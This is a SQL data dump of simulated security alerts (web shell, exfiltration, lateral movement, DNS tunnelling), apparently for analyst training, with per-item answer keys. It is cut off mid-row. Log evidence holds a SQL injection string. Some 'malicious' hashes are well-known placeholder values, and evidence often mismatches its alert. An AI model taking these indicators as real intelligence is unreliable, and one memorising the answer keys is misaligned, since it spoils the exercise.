(578, 'Web Shell Detected in Server Directory', 'high', 'File Integrity Monitoring', 'A web shell was detected in the server directory, indicating an attempt to maintain persistent access to the compromised system. The file integrity monitoring system flagged an unauthorized file upload, which was later identified as a web shell. The immediate threat involves potential unauthorized control over the server.', 'Persistence', 'T1505.003 - Web Shell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:35Z\",\"event_type\":\"file_change\",\"host_ip\":\"192.168.1.10\",\"file_path\":\"/var/www/html/shell.php\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"user\":\"webadmin\",\"source_ip\":\"203.0.113.45\",\"action\":\"upload\",\"status\":\"success\"}', '2026-01-08 22:06:19', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activities\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as a common web shell\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"shell.php\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Security Logs\",\"verdict\":\"suspicious\",\"details\":\"Filename matches pattern of known web shells\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'EDR', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.210Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:35Z\\\",\\\"event_type\\\":\\\"file_change\\\",\\\"host_ip\\\":\\\"192.168.1.10\\\",\\\"file_path\\\":\\\"/var/www/html/shell.php\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"webadmin\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"action\\\":\\\"upload\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.210Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:35Z\\\",\\\"event_type\\\":\\\"file_change\\\",\\\"host_ip\\\":\\\"192.168.1.10\\\",\\\"file_path\\\":\\\"/var/www/html/shell.php\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"webadmin\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"action\\\":\\\"upload\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.210Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:35Z\\\",\\\"event_type\\\":\\\"file_change\\\",\\\"host_ip\\\":\\\"192.168.1.10\\\",\\\"file_path\\\":\\\"/var/www/html/shell.php\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"webadmin\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"action\\\":\\\"upload\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.210Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:35Z\\\",\\\"event_type\\\":\\\"file_change\\\",\\\"host_ip\\\":\\\"192.168.1.10\\\",\\\"file_path\\\":\\\"/var/www/html/shell.php\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"webadmin\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"action\\\":\\\"upload\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.210Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:35Z\\\",\\\"event_type\\\":\\\"file_change\\\",\\\"host_ip\\\":\\\"192.168.1.10\\\",\\\"file_path\\\":\\\"/var/www/html/shell.php\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"webadmin\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"action\\\":\\\"upload\\\",\\\"status\\\":\\\"success\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(579, 'Unexpected Outbound Traffic Spike', 'high', 'Network Traffic Analysis', 'Detected a significant spike in outbound network traffic from internal systems to an external IP associated with known malicious activity. The data being exfiltrated includes sensitive files.', 'Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:07Z\",\"internal_ip\":\"192.168.1.15\",\"external_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"port\":443,\"bytes_sent\":10485760,\"filename\":\"confidential_data.zip\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"jdoe\",\"process\":\"data_exfil.exe\",\"url\":\"https://malicious-c2-server.com/upload\",\"indicator_type\":\"malware\"}', '2026-01-08 22:06:19', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known C2 server.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Security Policies\",\"verdict\":\"suspicious\",\"details\":\"Sensitive data file.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known exfiltration tool.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"https://malicious-c2-server.com/upload\",\"is_critical\":true,\"osint_result\":{\"source\":\"Domain Reputation\",\"verdict\":\"malicious\",\"details\":\"URL linked to malicious C2 activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 
'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(580, 'Unauthorized User Account Activity', 'high', 'User Authentication Logs', 'An attacker is using compromised credentials to move laterally across the network, attempting to access additional sensitive data.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-23T14:12:55Z\",\"event_id\":\"4624\",\"event_type\":\"Logon\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"username\":\"jdoe\",\"logon_type\":\"3\",\"logon_process\":\"NtLmSsp\",\"target_domain\":\"INTERNALCORP\",\"target_username\":\"jdoe\",\"logon_guid\":\"{3E7EAB11-4C7A-4D7D-BB8D-ED7BE3AB1A8A}\",\"source_port\":\"52435\",\"status\":\"Success\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"additional_info\":{\"filename\":\"compromised_document.docx\"}}', '2026-01-08 22:06:19', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known to be associated with APT attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Management\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a corporate server\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account, potential credential compromise\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used in lateral movement\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(581, 'Anomalous File Access Patterns', 'medium', 'File Access Logs', 'During routine monitoring, anomalous access patterns were detected on the file server. An external IP address was observed accessing multiple files containing sensitive information, potentially as a reconnaissance activity to identify valuable data for exfiltration.', 'Reconnaissance', 'T1592 - Gather Victim Host Information', 1, 'Closed', 259, '{\"timestamp\":\"2023-10-11T14:25:37Z\",\"event_type\":\"file_access\",\"user\":\"jdoe\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.101\",\"file_accessed\":[\"/finance/2023_budgets.xlsx\",\"/hr/employee_records.docx\",\"/legal/contracts/nda.pdf\"],\"file_hash\":[\"5f4dcc3b5aa765d61d8327deb882cf99\",\"098f6bcd4621d373cade4e832627b4f6\",\"e99a18c428cb38d5f260853678922e03\"],\"access_method\":\"smb\",\"action\":\"read\"}', '2026-01-08 22:06:19', '2026-03-07 19:27:45', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known reconnaissance activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of affected host\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"/finance/2023_budgets.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Sensitive financial document accessed\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"/hr/employee_records.docx\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Sensitive HR document 
accessed\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"/legal/contracts/nda.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Sensitive legal document accessed\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.213Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:25:37Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"file_accessed\\\":[\\\"/finance/2023_budgets.xlsx\\\",\\\"/hr/employee_records.docx\\\",\\\"/legal/contracts/nda.pdf\\\"],\\\"file_hash\\\":[\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"098f6bcd4621d373cade4e832627b4f6\\\",\\\"e99a18c428cb38d5f260853678922e03\\\"],\\\"access_method\\\":\\\"smb\\\",\\\"action\\\":\\\"read\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.213Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:25:37Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"file_accessed\\\":[\\\"/finance/2023_budgets.xlsx\\\",\\\"/hr/employee_records.docx\\\",\\\"/legal/contracts/nda.pdf\\\"],\\\"file_hash\\\":[\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"098f6bcd4621d373cade4e832627b4f6\\\",\\\"e99a18c428cb38d5f260853678922e03\\\"],\\\"access_method\\\":\\\"smb\\\",\\\"action\\\":\\\"read\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.213Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:25:37Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"file_accessed\\\":[\\\"/finance/2023_budgets.xlsx\\\",\\\"/hr/employee_records.docx\\\",\\\"/legal/contracts/nda.pdf\\\"],\\\"file_hash\\\":[\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"098f6bcd4621d373cade4e832627b4f6\\\",\\\"e99a18c428cb38d5f260853678922e03\\\"],\\\"access_method\\\":\\\"smb\\\",\\\"action\\\":\\\"read\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.213Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:25:37Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"file_accessed\\\":[\\\"/finance/2023_budgets.xlsx\\\",\\\"/hr/employee_records.docx\\\",\\\"/legal/contracts/nda.pdf\\\"],\\\"file_hash\\\":[\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"098f6bcd4621d373cade4e832627b4f6\\\",\\\"e99a18c428cb38d5f260853678922e03\\\"],\\\"access_method\\\":\\\"smb\\\",\\\"action\\\":\\\"read\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.213Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:25:37Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"file_accessed\\\":[\\\"/finance/2023_budgets.xlsx\\\",\\\"/hr/employee_records.docx\\\",\\\"/legal/contracts/nda.pdf\\\"],\\\"file_hash\\\":[\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"098f6bcd4621d373cade4e832627b4f6\\\",\\\"e99a18c428cb38d5f260853678922e03\\\"],\\\"access_method\\\":\\\"smb\\\",\\\"action\\\":\\\"read\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(582, 'DNS Tunneling Suspected', 'high', 'DNS Query Logs', 'A DNS tunneling technique has been detected, indicating potential command and control activities. The attacker is using DNS queries to maintain communication with compromised systems.', 'Command and Control', 'T1071.004', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:07Z\",\"source_ip\":\"10.2.3.15\",\"destination_ip\":\"203.0.113.45\",\"queried_domain\":\"malicious.example.com\",\"dns_query_type\":\"TXT\",\"dns_response\":\"d41d8cd98f00b204e9800998ecf8427e\",\"internal_host\":\"compromised-host.local\",\"username\":\"jdoe\",\"unique_transaction_id\":\"1234567890abcdef\",\"detected_hash\":\"e99a18c428cb38d5f260853678922e03\",\"detected_filename\":\"dns_tunnel_tool.exe\"}', '2026-01-08 22:06:19', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server IP used by APT groups.\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"malicious.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"DNS Threat List\",\"verdict\":\"malicious\",\"details\":\"Domain associated with DNS tunneling activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known DNS tunneling tool.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"dns_tunnel_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection System\",\"verdict\":\"malicious\",\"details\":\"File detected as DNS tunneling executable.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.214Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:07Z\\\",\\\"source_ip\\\":\\\"10.2.3.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"queried_domain\\\":\\\"malicious.example.com\\\",\\\"dns_query_type\\\":\\\"TXT\\\",\\\"dns_response\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"internal_host\\\":\\\"compromised-host.local\\\",\\\"username\\\":\\\"jdoe\\\",\\\"unique_transaction_id\\\":\\\"1234567890abcdef\\\",\\\"detected_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"detected_filename\\\":\\\"dns_tunnel_tool.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.214Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:07Z\\\",\\\"source_ip\\\":\\\"10.2.3.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"queried_domain\\\":\\\"malicious.example.com\\\",\\\"dns_query_type\\\":\\\"TXT\\\",\\\"dns_response\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"internal_host\\\":\\\"compromised-host.local\\\",\\\"username\\\":\\\"jdoe\\\",\\\"unique_transaction_id\\\":\\\"1234567890abcdef\\\",\\\"detected_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"detected_filename\\\":\\\"dns_tunnel_tool.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.214Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:07Z\\\",\\\"source_ip\\\":\\\"10.2.3.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"queried_domain\\\":\\\"malicious.example.com\\\",\\\"dns_query_type\\\":\\\"TXT\\\",\\\"dns_response\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"internal_host\\\":\\\"compromised-host.local\\\",\\\"username\\\":\\\"jdoe\\\",\\\"unique_transaction_id\\\":\\\"1234567890abcdef\\\",\\\"detected_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"detected_filename\\\":\\\"dns_tunnel_tool.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.214Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:07Z\\\",\\\"source_ip\\\":\\\"10.2.3.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"queried_domain\\\":\\\"malicious.example.com\\\",\\\"dns_query_type\\\":\\\"TXT\\\",\\\"dns_response\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"internal_host\\\":\\\"compromised-host.local\\\",\\\"username\\\":\\\"jdoe\\\",\\\"unique_transaction_id\\\":\\\"1234567890abcdef\\\",\\\"detected_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"detected_filename\\\":\\\"dns_tunnel_tool.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.214Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:07Z\\\",\\\"source_ip\\\":\\\"10.2.3.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"queried_domain\\\":\\\"malicious.example.com\\\",\\\"dns_query_type\\\":\\\"TXT\\\",\\\"dns_response\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"internal_host\\\":\\\"compromised-host.local\\\",\\\"username\\\":\\\"jdoe\\\",\\\"unique_transaction_id\\\":\\\"1234567890abcdef\\\",\\\"detected_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"detected_filename\\\":\\\"dns_tunnel_tool.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(583, 'Encrypted Traffic Anomaly', 'high', 'SSL/TLS Traffic Inspection', 'Anomalous encrypted traffic was detected, indicating potential data exfiltration activities. The attacker is leveraging SSL/TLS channels to evade detection.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-21T14:23:45Z\",\"source_ip\":\"192.168.1.22\",\"destination_ip\":\"203.0.113.45\",\"ssl_subject\":\"CN=malicious-actor.com\",\"ssl_issuer\":\"CN=Let\'s Encrypt Authority X3\",\"data_volume\":\"5GB\",\"file_hash\":\"d2d2d0f9e0c8c0a0a1b2d2e0f9f0f9a1\",\"filename\":\"encrypted_payload.bin\",\"user\":\"jdoe\",\"action\":\"data_exfiltration\",\"protocol\":\"TLSv1.2\",\"alert_id\":\"EXFIL-2023-0008\",\"user_agent\":\"curl/7.68.0\"}', '2026-01-08 22:06:19', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.22\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d2d2d0f9e0c8c0a0a1b2d2e0f9f0f9a1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT data exfiltration tools.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"encrypted_payload.bin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual file detected during traffic inspection.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"User is registered and 
active within the organization.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.216Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.22\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"ssl_subject\\\":\\\"CN=malicious-actor.com\\\",\\\"ssl_issuer\\\":\\\"CN=Let\'s Encrypt Authority X3\\\",\\\"data_volume\\\":\\\"5GB\\\",\\\"file_hash\\\":\\\"d2d2d0f9e0c8c0a0a1b2d2e0f9f0f9a1\\\",\\\"filename\\\":\\\"encrypted_payload.bin\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_exfiltration\\\",\\\"protocol\\\":\\\"TLSv1.2\\\",\\\"alert_id\\\":\\\"EXFIL-2023-0008\\\",\\\"user_agent\\\":\\\"curl/7.68.0\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.216Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.22\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"ssl_subject\\\":\\\"CN=malicious-actor.com\\\",\\\"ssl_issuer\\\":\\\"CN=Let\'s Encrypt Authority 
